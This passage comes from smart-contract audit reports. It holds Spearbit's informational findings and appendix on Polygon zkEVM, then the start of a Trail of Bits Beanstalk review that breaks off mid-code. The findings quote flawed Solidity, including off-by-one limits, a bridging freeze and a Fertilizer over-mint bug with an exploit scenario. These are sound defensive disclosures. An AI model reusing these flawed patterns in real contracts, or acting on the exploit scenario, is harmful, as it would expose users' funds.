5.4.14 Add additional comments to function forceBatch() Severity: Informational Context: PolygonZkEVM.sol#L920-L966 Description: The function forceBatch() contains a comment about synch attacks. It's not immediately clear what is meant by that. The team explained the following: • Getting the call data from an EOA is easy/cheap, so there is no need to put the transactions in the event (which is expensive). • Getting the internal call data from internal transactions (which is done via a smart contract) is complicated (because it requires an archival node), and then it's worth it to put the transactions in the event, which is easy to query.

function forceBatch(...) ... {
    ...
    // In order to avoid synch attacks, if the msg.sender is not the origin
    // Add the transaction bytes in the event
    if (msg.sender == tx.origin) {
        emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, "");
    } else {
        emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, transactions);
    }
}

Recommendation: Add additional comments to the function forceBatch() to explain the approach taken. Polygon-Hermez: Solved in PR 88. Spearbit: Verified.

5.4.15 Check against MAX_VERIFY_BATCHES Severity: Informational Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L545-L611, PolygonZkEVM.sol#L972-L1054 Description: In several functions a comparison is made with < MAX_VERIFY_BATCHES. This should probably be <= MAX_VERIFY_BATCHES; otherwise, the MAX will never be reached.

uint64 public constant MAX_VERIFY_BATCHES = 1000;

function sequenceForceBatches(ForcedBatchData[] memory batches) ...
{
    uint256 batchesNum = batches.length;
    ...
    require(batchesNum < MAX_VERIFY_BATCHES, ...);
    ...
}

function sequenceBatches(BatchData[] memory batches) ... {
    uint256 batchesNum = batches.length;
    ...
    require(batchesNum < MAX_VERIFY_BATCHES, ...);
    ...
}

function verifyBatches(...) ... {
    ...
    require(finalNewBatch - initNumBatch < MAX_VERIFY_BATCHES, ...);
    ...
}

Recommendation: Double-check the conclusion and consider applying these changes:

-require( ... < MAX_VERIFY_BATCHES, ... );
+require( ... <= MAX_VERIFY_BATCHES, ... );

Polygon-Hermez: Solved in PR 88. Spearbit: Verified.

5.4.16 Prepare for multiple aggregators/sequencers to improve availability Severity: Informational Context: PolygonZkEVM.sol#L377-L391 Description: As long as there is a single trusted sequencer and a single trusted aggregator, the availability risks are relatively high. However, the current code isn't optimized to support multiple trusted sequencers and multiple trusted aggregators.

modifier onlyTrustedSequencer() {
    require(trustedSequencer == msg.sender, ...);
    _;
}

modifier onlyTrustedAggregator() {
    require(trustedAggregator == msg.sender, ...);
    _;
}

Recommendation: It might be useful to make small changes in the code to support multiple trusted sequencers and multiple trusted aggregators to improve availability. Polygon-Hermez: Since the trustedSequencer/trustedAggregator address can be changed, if we want to support multiple trusted actors and/or add a consensus layer to coordinate them, this will be delegated in the future to another smart contract. Spearbit: Acknowledged.
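For illustration, a minimal sketch of how the modifiers could be generalized (mapping-based allowlists; hypothetical names and error strings, not reviewed code):

// Sketch: replace the single trusted addresses with allowlists.
mapping(address => bool) public trustedSequencers;
mapping(address => bool) public trustedAggregators;

modifier onlyTrustedSequencer() {
    require(trustedSequencers[msg.sender], "PolygonZkEVM: not a trusted sequencer");
    _;
}

modifier onlyTrustedAggregator() {
    require(trustedAggregators[msg.sender], "PolygonZkEVM: not a trusted aggregator");
    _;
}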
5.4.17 Temporary fund freeze on using multiple rollups Severity: Informational Context: PolygonZkEVMBridge.sol#L157-L165 Description: Claiming of assets will freeze temporarily if multiple rollups are involved, as shown below. The asset will be lost if the transfer is done between: a. Mainnet -> R1 -> R2 b. R1 -> R2 -> Mainnet

1. USDC is bridged from Mainnet to Rollup R1 with its metadata.
2. The user claims this, and a new wrapped token is deployed using the USDC token and its metadata.

bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress));
TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals);

3. Let's say the user bridges this token to Rollup R2. This will burn the wrapped token on R1.

if (tokenInfo.originTokenAddress != address(0)) {
    // The token is a wrapped token from another network
    // Burn tokens
    TokenWrapped(token).burn(msg.sender, amount);
    originTokenAddress = tokenInfo.originTokenAddress;
    originNetwork = tokenInfo.originNetwork;
}

4. The problem is that the metadata was not set while bridging.
5. So once the user claims this on R2, wrapped token creation will fail, since abi.decode on empty metadata will fail to retrieve name, symbol, ...

The asset will be temporarily lost since it was bridged properly but cannot be claimed. The transaction chain:

Mainnet:
bridgeAsset(usdc, R1, 0xUser1, 100, "")
• Transfer 100 USDC to Mainnet M1
• originTokenAddress = USDC
• originNetwork = Mainnet
• metadata = (USDC, USDC, 6)
• Deposit node created

R1:
claimAsset(..., Mainnet, USDC, R1, 0xUser1, 100, metadata = (USDC, USDC, 6))
• Claim verified
• Marked claimed
• tokenInfoHash derived from originNetwork, originTokenAddress, which is Mainnet, USDC
• tokenInfoToWrappedToken[Mainnet, USDC] created using metadata = (USDC, USDC, 6)
• User minted 100 amount of tokenInfoToWrappedToken[Mainnet, USDC]

bridgeAsset(tokenInfoToWrappedToken[Mainnet, USDC], R2, 0xUser2, 100, "")
• Burn 100 tokenInfoToWrappedToken[Mainnet, USDC]
• originTokenAddress = USDC
• originNetwork = Mainnet
• metadata = ""
• Deposit node created with empty metadata

R2:
claimAsset(..., Mainnet, USDC, R2, 0xUser2, 100, metadata = "")
• Claim verified
• Marked claimed
• tokenInfoHash derived from originNetwork, originTokenAddress, which is Mainnet, USDC
• Since metadata = "", abi.decode fails

Recommendation: Since the current system does not support multiple rollups, this issue is marked informational. But in the future, when multiple rollups are in place, this code needs to be upgraded to retrieve the metadata during the burn while bridging, which will ensure the recipient rollup can correctly decode the metadata. Polygon-Hermez: We will take this into account if we upgrade the system to support multiple rollups. Spearbit: Acknowledged.

5.4.18 Off by one error when comparing with MAX_TRANSACTIONS_BYTE_LENGTH constant Severity: Informational Context: PolygonZkEVM.sol#L933, PolygonZkEVM.sol#L471 Description: When comparing against MAX_TRANSACTIONS_BYTE_LENGTH, the valid range should be <= instead of <.

require(
    transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH,
    "PolygonZkEVM::forceBatch: Transactions bytes overflow"
);

require(
    currentBatch.transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH,
    "PolygonZkEVM::sequenceBatches: Transactions bytes overflow"
);

Recommendation: Consider using <= instead of <. Polygon-Hermez: Solved in PR 88. Spearbit: Verified.

5.4.19 trustedAggregatorTimeout value may impact batchFees Severity: Informational Context: PolygonZkEVM.sol#L855-L858, PolygonZkEVM.sol#L557-L562 Description: If trustedAggregatorTimeout and veryBatchTimeTarget have similar values, then all batches verified by a 3rd party will be above target (totalBatchesAboveTarget), and this would impact batch fees.

1. Let's say veryBatchTimeTarget is 30 min and trustedAggregatorTimeout is 31 min.
2. Now anyone can call verifyBatches only after 31 min, due to the condition below.

require(
    sequencedBatches[finalNewBatch].sequencedTimestamp + trustedAggregatorTimeout <= block.timestamp,
    "PolygonZkEVM::verifyBatches: Trusted aggregator timeout not expired"
);

3. This means _updateBatchFee can at minimum be called 31 min after sequencing by a non-trusted aggregator.
4. The condition below then always returns true.

if (
    block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget // 31 > 30
) {

Recommendation: As mentioned by the product team, the trustedAggregatorTimeout value is only meant to be high at initialization and during emergencies, when 3rd-party aggregation should not happen anyway, thus preventing the issue. Apart from initialization and emergencies, trustedAggregatorTimeout is meant to move towards 0.
Hence, it could be documented as a reference for the Admin that the Admin should always take care to set the value lower than veryBatchTimeTarget during normal operation. Polygon-Hermez: Added a comment in PR 88. Spearbit: Verified.

5.4.20 Largest allowed batch fee multiplier is 1023 instead of 1024 Severity: Informational Context: PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L133 Description: Per the setMultiplierBatchFee function, the largest allowed batch fee multiplier is 1023.

/**
 * @notice Allow the admin to set a new multiplier batch fee
 * @param newMultiplierBatchFee multiplier bathc fee
 */
function setMultiplierBatchFee(
    uint16 newMultiplierBatchFee
) public onlyAdmin {
    require(
        newMultiplierBatchFee >= 1000 && newMultiplierBatchFee < 1024,
        "PolygonZkEVM::setMultiplierBatchFee: newMultiplierBatchFee incorrect range"
    );
    multiplierBatchFee = newMultiplierBatchFee;
    emit SetMultiplierBatchFee(newMultiplierBatchFee);
}

However, the comment mentions that the largest allowed value is 1024.

// Batch fee multiplier with 3 decimals that goes from 1000 - 1024
uint16 public multiplierBatchFee;

Recommendation: The implementation should be consistent with the comment and vice versa. Therefore, consider updating the implementation to allow the largest batch fee multiplier to be 1024, or update the comment accordingly. Polygon-Hermez: The comment is updated in PR 87. Spearbit: Verified.

5.4.21 Deposit token associated risk awareness Severity: Informational Context: PolygonZkEVMBridge.sol#L129 Description: The deposited tokens locked in L1 could be at risk due to external conditions like the one shown below: 1. Assume there is a huge amount of token X being bridged to a rollup. 2. Now mainnet will have a huge balance of token X. 3. Unfortunately, due to a hack or a LUNA-like event, the project owner takes a snapshot of the current token X balance for each user address, and later all these addresses will be airdropped with a new token based on the snapshot value. 4. In this case, the token X balance on mainnet will be included in the snapshot, but at disbursal time the new token will be airdropped to the mainnet bridge contract and not to the user. 5. There is no emergency withdraw method to get these airdropped funds out. 6. For the users, if they claim funds, they still get token X, which is worthless. Recommendation: Update the documentation to make users aware of such edge cases and the possible actions to be taken. Polygon-Hermez: This is not a scenario that affects only our zkEVM, but one that affects all contracts (DeFi, bridges, etc.). Users usually notice this kind of situation, which is why they will usually move their funds back to their mainnet address. For those who don't know about this situation, projects that make this kind of airdrop usually warn users about these conditions. Nevertheless, the project could even airdrop the corresponding funds on L2, but this will always be the responsibility of the project. Spearbit: Acknowledged.

5.4.22 Fees might get stuck when Aggregator is unable to verify Severity: Informational Context: PolygonZkEVM.sol#L523 Description: The fees collected from the Sequencer will be stuck in the contract if the Aggregator is unable to verify the batch. In this case, the Aggregator will not be paid and the batch transaction fee will get stuck in the contract. Recommendation: In the future, if these collected fees become significant, a temporary contract upgrade may be required to allow transferring these funds. Polygon-Hermez: This is intended; the fees must be stuck in the contract until an aggregator verifies batches.
Put differently, if the fees could be retrieved from the contract, the aggregator reward could be stolen. It makes sense that aggregators do not receive rewards if the network is stopped. In case an aggregator is unable to verify a batch, the whole system will be blocked. The aggregator fees might be a problem, but a very small one compared with a whole network that is stopped (or at least one whose withdrawals are stopped); technically all the bridge funds would be blocked, which is a bigger problem, and for sure we would need an upgrade if this happens. In summary, the point is that we are doing everything to avoid this situation, but if it happens, an upgrade will be necessary anyway; we don't think it's worth putting any additional mechanism in place in this regard. Spearbit: Acknowledged.

5.4.23 Consider using OpenZeppelin's ECDSA library over ecrecover Severity: Informational Context: TokenWrapped.sol#L100 Description: As stated here, ecrecover is vulnerable to a signature malleability attack. While the code in permit is not vulnerable since a nonce is used in the signed data, we'd still recommend using OpenZeppelin's ECDSA library, as it performs the malleability safety check for you, as well as the signer != address(0) check done on the next line. Recommendation: Replace the ecrecover call with an ECDSA.recover() call. Polygon-Hermez: We prefer to use this approach since it does not perform additional checks, is more gas efficient and simpler, and is used by very common projects like UNI. Spearbit: Acknowledged.

5.4.24 Risk of transactions not yet in Consolidated state on L2 Severity: Informational Context: PolygonZkEVMBridge.sol#L540-L548 Description: There is a relatively long period during which batches, and thus transactions, are between the Trusted state and the Consolidated state: normally around 30 minutes, but in exceptional situations up to 2 weeks. On the L2, users normally interact with the Trusted state. However, they should be aware of the risk for high-value transactions (especially for transactions that can't be undone, like transactions that have an effect outside of the L2, such as off-ramps, OTC transactions, alternative bridges, etc.). There will be custom RPC endpoints that can be used to retrieve status information, see zkevm.go. Recommendation: Make sure to document the risk of transactions that are not consolidated yet on L2. Polygon-Hermez: We will add a comment regarding this in the documentation. We also want to add this information to the block explorer, similar to how Optimism is doing it: optimistic.etherscan. In the blockNumber field, put extra information like: confirmed by sequencer, virtual state, consolidated state. Spearbit: Acknowledged.

5.4.25 Delay of bridging from L2 to L1 Severity: Informational Context: PolygonZkEVMBridge.sol#L540-L548 Description: The bridge uses the Consolidated state while bridging from L2 to L1, and the user interface, public.zkevm-test.net, shows "Waiting for validity proof. It can take between 15 min and 1 hour.". Other (optimistic) bridges use liquidity providers who take on the risk and allow users to retrieve funds in a shorter amount of time (for a fee). Recommendation: Consider implementing a mechanism to reduce the time to bridge from L2 to L1. Polygon-Hermez: We do not plan to implement such a mechanism. We consider the 15 min - 1 hour an acceptable delay since it is a typical timing in most CEXs, so users are already used to this timing for being able to withdraw funds.
In case it becomes a must for the users, we expect that other projects can deploy on top of our system and provide such solutions, with some incentive mechanism, using the messages between layers. Spearbit: Acknowledged.

5.4.26 Missing NatSpec documentation Severity: Informational Context: PolygonZkEVM.sol#L672, PolygonZkEVM.sol#L98 Description: Some NatSpec comments are either missing or incomplete. • Missing NatSpec comment for pendingStateNum:

/**
 * @notice Verify batches internal function
 * @param initNumBatch Batch which the aggregator starts the verification
 * @param finalNewBatch Last batch aggregator intends to verify
 * @param newLocalExitRoot New local exit root once the batch is processed
 * @param newStateRoot New State root once the batch is processed
 * @param proofA zk-snark input
 * @param proofB zk-snark input
 * @param proofC zk-snark input
 */
function _verifyBatches(
    uint64 pendingStateNum,
    uint64 initNumBatch,
    uint64 finalNewBatch,
    bytes32 newLocalExitRoot,
    bytes32 newStateRoot,
    uint256[2] calldata proofA,
    uint256[2][2] calldata proofB,
    uint256[2] calldata proofC
) internal {

• Missing NatSpec comment for pendingStateTimeout:

/**
 * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed
 * and avoid stack too deep errors.
 * @param admin Admin address
 * @param chainID L2 chainID
 * @param trustedSequencer Trusted sequencer address
 * @param forceBatchAllowed Indicates wheather the force batch functionality is available
 * @param trustedAggregator Trusted aggregator
 * @param trustedAggregatorTimeout Trusted aggregator timeout
 */
struct InitializePackedParameters {
    address admin;
    uint64 chainID;
    address trustedSequencer;
    uint64 pendingStateTimeout;
    bool forceBatchAllowed;
    address trustedAggregator;
    uint64 trustedAggregatorTimeout;
}

Recommendation: Add or complete missing NatSpec comments. Polygon-Hermez: Solved in PR 87. Spearbit: Verified.

5.4.27 _minDelay could be 0 without emergency Severity: Informational Context: PolygonZkEVMTimelock.sol#L40-L46 Description: Normally, the min delay is only supposed to be 0 when in an emergency state. But it could be set to 0 even in non-emergency mode, as shown below: 1. A proposer can propose an operation for changing _minDelay to 0 via the updateDelay function. 2. Now, if this operation is executed by the executor, then _minDelay will be 0 even without an emergency state. Recommendation: Override the updateDelay function and impose a minimum timelock delay preventing a 0 delay, OR update the docs to make users aware of such scenario(s) so that they can take a decision if such a proposal ever arrives. Polygon-Hermez: Being able to update the delay to 0 is the standard in most Timelock implementations, including the one followed by OpenZeppelin; we don't see a reason to change its default behavior. Since this is the default behavior, users are already aware of this scenario. Spearbit: Acknowledged.

5.4.28 Incorrect/incomplete comment Severity: Informational Context: Mentioned in Recommendation Description: There are a few mistakes in the comments that can be corrected in the codebase. Recommendation:
• PolygonZkEVM.sol#L1106: This function is used for configuring the pending state timeout.
- * @notice Allow the admin to set a new trusted aggregator timeout
+ * @notice Allow the admin to set a new pending state timeout
• PolygonZkEVMBridge.sol#L217: The function also sends ETH; it would be good to add that to the NatSpec.
- * @notice Bridge message
+ * @notice Bridge message and send ETH value
• PolygonZkEVMBridge.sol#L69: A developer assumption is not documented.
+ * @notice The value of `_polygonZkEVMaddress` on the L2 deployment of the contract will be `address(0)`, so
+ * emergency state is not possible for the L2 deployment of the bridge, intentionally
• PolygonZkEVM.sol#L141: The comment is not synchronized with the ForcedBatchData struct. It should be minForcedTimestamp instead of minTimestamp for the last parameter.
// hashedForcedBatchData: hash containing the necessary information to force a batch:
- // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minTimestamp)
+ // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minForcedTimestamp)
• PolygonZkEVM.sol#L522: The comment is incorrect; the sequencer actually pays collateral for every non-forced batch submitted, not for every batch submitted.
- // Pay collateral for every batch submitted
+ // Pay collateral for every non-forced batch submitted
• PolygonZkEVM.sol#L864: The comment is incorrect; the actual variable updated is currentBatch, not currentLastVerifiedBatch.
- // update currentLastVerifiedBatch
+ // update currentBatch
• PolygonZkEVM.sol#L1193: The comment seems to be copy-pasted from another method, proveNonDeterministicPendingState; remove it or write a comment for the current function.
- * @notice Allows to halt the PolygonZkEVM if its possible to prove a different state root given the same batches
Polygon-Hermez: Solved in PR 87. Spearbit: Verified.

5.4.29 Typos, grammatical and styling errors Severity: Informational Context: Mentioned in Recommendation Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Some functions could also be renamed to better reflect their purposes. Recommendation:
• PolygonZkEVM.sol#L671: The function _verifyBatches() does more than verifying batches; it also transfers MATIC. Therefore, it is recommended to change the function name and comment.
- function _verifyBatches(
+ function _verifyAndRewardBatches(
      uint64 pendingStateNum,
      uint64 initNumBatch,
• PolygonZkEVMBridge.sol#L37: Typo. Should be identifier instead of indentifier.
- // Mainnet indentifier
+ // Mainnet identifier
• TokenWrapped.sol#L53: Typo. Should be immutable instead of inmutable.
- // initialize inmutable variables
+ // initialize immutable variables
• PolygonZkEVM.sol#L407, PolygonZkEVM.sol#L970: Typo and grammatical error. Should be batches to instead of batces ot, and should be Struct array which holds the necessary data instead of Struct array which the necessary data.
- * @param batches Struct array which the necessary data to append new batces ot the sequence
+ * @param batches Struct array which holds the necessary data to append new batches to the sequence
• PolygonZkEVM.sol#L1502: Typo. Should be the instead of teh.
- * @param initNumBatch Batch which the aggregator starts teh verification
+ * @param initNumBatch Batch which the aggregator starts the verification
• PolygonZkEVM.sol#L1396: Typo. Should be contracts instead of contrats.
- * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contrats
+ * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contracts
• PolygonZkEVM.sol#L1430: Typo.
Should be contracts instead of contrats.
- * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats
+ * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts
• PolygonZkEVM.sol#L144: Typo. Should be contracts instead of contrats.
- * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats
+ * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts
• PolygonZkEVM.sol#L1108: Typo. Should be aggregator instead of aggreagator.
- * @param newTrustedAggregatorTimeout Trusted aggreagator timeout
+ * @param newTrustedAggregatorTimeout Trusted aggregator timeout
• PolygonZkEVM.sol#L969: Grammatical error. Should be has not done so in the timeout period instead of do not have done it in the timeout period.
- * @notice Allows anyone to sequence forced Batches if the trusted sequencer do not have done it in the timeout period
+ * @notice Allows anyone to sequence forced Batches if the trusted sequencer has not done so in the timeout period
• PolygonZkEVM.sol#L1291: Typo. Should be function instead of functoin.
- * @notice Internal functoin that prove a different state root given the same batches to verify
+ * @notice Internal function that prove a different state root given the same batches to verify
• PolygonZkEVM.sol#L1062: Typo. Should be sequencer instead of sequuencer.
- * @param newTrustedSequencer Address of the new trusted sequuencer
+ * @param newTrustedSequencer Address of the new trusted sequencer
• PolygonZkEVM.sol#L1094: Legacy comment. Does not make sense with the current code.
- * If address 0 is set, everyone is free to aggregate
• PolygonZkEVM.sol#L1131: Typo. Should be aggregator instead of aggreagator.
- * @param newPendingStateTimeout Trusted aggreagator timeout
+ * @param newPendingStateTimeout Trusted aggregator timeout
• PolygonZkEVM.sol#L1153: Typo. Should be batch instead of bathc.
- * @param newMultiplierBatchFee multiplier bathc fee
+ * @param newMultiplierBatchFee multiplier batch fee
• PolygonZkEVM.sol#L1367: Grammatical error. Should be must be equal to instead of must be equal than.
- "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal than currentLastVerifiedBatch"
+ "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal to currentLastVerifiedBatch"
• PolygonZkEVM.sol#L332: Typo. Should be deep instead of depp.
- * @param initializePackedParameters Struct to save gas and avoid stack too depp errors
+ * @param initializePackedParameters Struct to save gas and avoid stack too deep errors
• PolygonZkEVM.sol#L85: Typo. Should be because instead of becasue.
- * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed
+ * @notice Struct to call initialize, this basically saves gas because pack the parameters that can be packed
• PolygonZkEVM.sol#L59: Typo. Should be calculate instead of calcualte.
- * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calcualte the fees
+ * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calculate the fees
• PolygonZkEVM.sol#L276: Typo.
Should be sequencer instead of seequencer.
- * @dev Emitted when the admin update the seequencer URL
+ * @dev Emitted when the admin update the sequencer URL
• PolygonZkEVM.sol#L459: Grammatical error. Should be Check global exit root exists with proper batch length. These checks are already done in the forceBatches call. instead of Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call.
- // Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call
+ // Check global exit root exists with proper batch length. These checks are already done in the forceBatches call.
• PolygonZkEVM.sol#L123, PolygonZkEVM.sol#L755: Typo. Should be tries instead of trys.
- // This should be a protection against someone that trys to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires
+ // This should be a protection against someone that tries to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires
- * It trys to consolidate the first and the middle pending state
+ * It tries to consolidate the first and the middle pending state
• PolygonZkEVM.sol#L55: Grammatical error. Should be Struct which will be stored instead of Struct which will stored.
- * @notice Struct which will stored for every batch sequence
+ * @notice Struct which will be stored for every batch sequence
• PolygonZkEVM.sol#L71: Grammatical error. Should be will be turned off instead of will be turn off, and should be in the future instead of in a future.
- * This is a protection mechanism against soundness attacks, that will be turn off in a future
+ * This is a protection mechanism against soundness attacks, that will be turned off in the future
• PolygonZkEVM.sol#L90: Typo. Should be whether instead of wheather.
- * @param forceBatchAllowed Indicates wheather the force batch functionality is available
+ * @param forceBatchAllowed Indicates whether the force batch functionality is available
Polygon-Hermez: Solved in PR 87. Spearbit: Verified.

5.4.30 Enforce parameter limits in initialize() of PolygonZkEVM Severity: Informational Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVM.sol#L1110-L1149 Description: The function initialize() of PolygonZkEVM doesn't enforce limits on trustedAggregatorTimeout and pendingStateTimeout, whereas the update functions setTrustedAggregatorTimeout() and setPendingStateTimeout() do. As the project has indicated, it might be useful to set larger values in initialize().

function initialize(..., InitializePackedParameters calldata initializePackedParameters, ...) ... {
    trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout;
    ...
    pendingStateTimeout = initializePackedParameters.pendingStateTimeout;
    ...
}

function setTrustedAggregatorTimeout(uint64 newTrustedAggregatorTimeout) public onlyAdmin {
    require(newTrustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT, ...);
    ...
    trustedAggregatorTimeout = newTrustedAggregatorTimeout;
    ...
}

function setPendingStateTimeout(uint64 newPendingStateTimeout) public onlyAdmin {
    require(newPendingStateTimeout <= HALT_AGGREGATION_TIMEOUT, ...);
    ...
    pendingStateTimeout = newPendingStateTimeout;
    ...
}

Recommendation: Consider enforcing the same limits in initialize() as in the update functions; this will make the code easier to reason about. If different limits are allowed on purpose, then add some comments.
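For illustration, a minimal sketch of such checks in initialize(), mirroring the bound already enforced by the setters (error strings are hypothetical):

function initialize(..., InitializePackedParameters calldata initializePackedParameters, ...) ... {
    // Sketch: reuse the HALT_AGGREGATION_TIMEOUT bound from the setter functions.
    require(
        initializePackedParameters.trustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT,
        "PolygonZkEVM::initialize: trustedAggregatorTimeout too large"
    );
    require(
        initializePackedParameters.pendingStateTimeout <= HALT_AGGREGATION_TIMEOUT,
        "PolygonZkEVM::initialize: pendingStateTimeout too large"
    );
    trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout;
    ...
    pendingStateTimeout = initializePackedParameters.pendingStateTimeout;
    ...
}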
Polygon-Hermez: Solved in PR 85. Spearbit: Verified.

6 Appendix

6.1 Introduction On March 20th of 2023, Spearbit conducted a deployment review for Polygon zkEVM. The target of the review was zkevm-contracts at commit cddde2. Disclaimer: This security review does not guarantee against a hack. It is a snapshot in time of the deployment review for Polygon zkEVM according to the specific commit. Any modifications to the code will require a new security review.

6.2 Changes after first review Several changes have been made after the first Spearbit review conducted in January 2023 (found in the main body of this document), which include: • A change of the verifier to FflonkVerifier; • A way to delay setting the global exit root, as well as updateGlobalExitRoot() in PolygonZkEVMBridge; • setForceBatchTimeout() and activateForceBatches() in PolygonZkEVM to switch on the ForceBatches mechanism at a later moment; • Several fixes and optimizations.

6.3 Results No security issues have been found in the above-mentioned changes.

6.3.1 Mainnet deployment The following deployment addresses on Ethereum Mainnet were checked: • PolygonZkEVM proxy • PolygonZkEVM implementation • FflonkVerifier • PolygonZkEVMBridge proxy • PolygonZkEVMBridge implementation • PolygonZkEVMGlobalExitRoot proxy • PolygonZkEVMGlobalExitRoot implementation • PolygonZkEVMDeployer • PolygonZkEVMTimelock • ProxyAdmin

6.3.2 Findings Some of the contracts have extra junk code in the Etherscan verification. This is not a security risk, but it could be a reputation risk. This is present in the following contracts: • PolygonZkEVMBridge proxy • ProxyAdmin Different proxy contracts are used, two based on Solidity 0.8.9 and one based on Solidity 0.8.17. This is not a security risk, but it is less consistent. • PolygonZkEVM proxy uses Solidity v0.8.9 • PolygonZkEVMGlobalExitRoot proxy uses Solidity v0.8.9 • PolygonZkEVMBridge proxy uses Solidity v0.8.17 Polygon: Etherscan does not currently let you verify your code if a verification matching that same bytecode already exists. We will contact Etherscan to allow verification without junk code. The PolygonZkEVMBridge is deployed via PolygonZkEVMDeployer to allow deployment with the same address on all chains. This is why this proxy uses Solidity 0.8.17. Otherwise, the proxies are the standard version.

6.3.3 L2 deployment On the L2 (i.e., the zkEVM itself), the following contracts are deployed: • L2 PolygonZkEVMBridge proxy • L2 PolygonZkEVMBridge implementation • L2 PolygonZkEVMGlobalExitRootL2 proxy • L2 PolygonZkEVMGlobalExitRootL2 implementation • L2 PolygonZkEVMDeployer • L2 PolygonZkEVMTimelock • L2 ProxyAdmin

6.3.4 Findings The deployments on L2 were not checked because ZKEVM Polygonscan isn't available yet and the contracts are not yet verified.

diff --git a/findings_newupdate/tob/2022-07-beanstalk-securityreview.txt b/findings_newupdate/tob/2022-07-beanstalk-securityreview.txt
new file mode 100644
index 0000000..cf6bc99
--- /dev/null
+++ b/findings_newupdate/tob/2022-07-beanstalk-securityreview.txt
@@ -0,0 +1,12 @@
+1. Attackers could mint more Fertilizer than intended due to an unused variable Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-001 Target: protocol/contracts/farm/facets/FertilizerFacet.sol Description Due to an unused local variable, an attacker could mint more Fertilizer than should be allowed by the sale.
The mintFertilizer() function checks that the _amount variable is no greater than the remaining variable; this ensures that more Fertilizer than intended cannot be minted. However, the _amount variable is not used in subsequent function calls; instead, the amount variable is used. The code therefore effectively skips this check, allowing users to mint more Fertilizer than required to recapitalize the protocol.

function mintFertilizer(
    uint128 amount,
    uint256 minLP,
    LibTransfer.From mode
) external payable {
    uint256 remaining = LibFertilizer.remainingRecapitalization();
    uint256 _amount = uint256(amount);
    if (_amount > remaining) _amount = remaining;
    LibTransfer.receiveToken(
        C.usdc(),
        uint256(amount).mul(1e6),
        msg.sender,
        mode
    );
    uint128 id = LibFertilizer.addFertilizer(
        uint128(s.season.current),
        amount,
        minLP
    );
    C.fertilizer().beanstalkMint(msg.sender, uint256(id), amount, s.bpf);
}

Figure 1.1: The mintFertilizer() function in FertilizerFacet.sol#L35- Note that this flaw can be exploited only once: if users mint more Fertilizer than intended, the remainingRecapitalization() function returns 0 because the dollarPerUnripeLP() and unripeLP().totalSupply() values are constants.

function remainingRecapitalization() internal view returns (uint256 remaining) {
    AppStorage storage s = LibAppStorage.diamondStorage();
    uint256 totalDollars = C
        .dollarPerUnripeLP()
        .mul(C.unripeLP().totalSupply())
        .div(DECIMALS);
    if (s.recapitalized >= totalDollars) return 0;
    return totalDollars.sub(s.recapitalized);
}

Figure 1.2: The remainingRecapitalization() function in LibFertilizer.sol#L132-145 Exploit Scenario Recapitalization of the Beanstalk protocol is almost complete; only 100 units of Fertilizer for sale remain. Eve, a malicious user, calls mintFertilizer() with an amount of 10 million, significantly over-funding the system. Because the Fertilizer supply increased significantly above the theoretical maximum, other users are entitled to a much smaller yield than expected. Recommendations Short term, use _amount instead of amount as the parameter in the functions that are called after mintFertilizer(). Long term, thoroughly document the expected behavior of the FertilizerFacet contract and the properties (invariants) it should enforce, such as "token amounts above the maximum recapitalization threshold cannot be sold." Expand the unit test suite to test that these properties hold.

+2. Lack of a two-step process for ownership transfer Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-BEANS-002 Target: protocol/contracts/farm/facets/OwnershipFacet.sol Description The transferOwnership() function is used to change the owner of the Beanstalk protocol. This function calls the setContractOwner() function, which immediately sets the contract's new owner. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes.

function transferOwnership(address _newOwner) external override {
    LibDiamond.enforceIsContractOwner();
    LibDiamond.setContractOwner(_newOwner);
}

Figure 2.1: The transferOwnership() function in OwnershipFacet.sol#L13-16 Exploit Scenario The owner of the Beanstalk contracts is a community-controlled multisignature wallet. The community agrees to upgrade to an on-chain voting system, but the wrong address is mistakenly provided to its call to transferOwnership(), permanently misconfiguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer.
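A minimal sketch of such a two-step handover in the diamond's ownership facet (the ownerCandidate storage field and the claimOwnership() name are hypothetical):

// Sketch: the proposed owner must explicitly accept the role.
function transferOwnership(address _newOwner) external override {
    LibDiamond.enforceIsContractOwner();
    s.ownerCandidate = _newOwner; // hypothetical storage field; no transfer yet
}

function claimOwnership() external {
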